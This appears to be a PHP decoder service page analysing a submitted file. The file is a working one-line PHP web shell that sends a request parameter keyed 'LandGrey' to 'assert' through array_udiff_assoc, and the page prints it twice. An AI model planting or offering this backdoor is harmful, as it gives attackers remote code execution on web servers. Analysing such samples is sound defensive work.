Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /** * Noticed: (PHP 5 >= 5.4.0, PHP 7) * */ $password = "LandGrey"; array_udif..

Decoded Output download

<?php 
/** 
* Noticed: (PHP 5 >= 5.4.0, PHP 7) 
* 
*/ 
$password = "LandGrey"; 
array_udiff_assoc(array($_REQUEST[$password]), array(1), "assert"); 
?>

Did this file decode correctly?

Original Code

<?php
/**
* Noticed: (PHP 5 >= 5.4.0, PHP 7)
*
*/
$password = "LandGrey";
array_udiff_assoc(array($_REQUEST[$password]), array(1), "assert");
?>

Function Calls

array_udiff_assoc 1

Variables

$password LandGrey

Stats

MD5 41838f0c71daa2fd1d81d91aacb415db
Eval Count 0
Decode Time 95 ms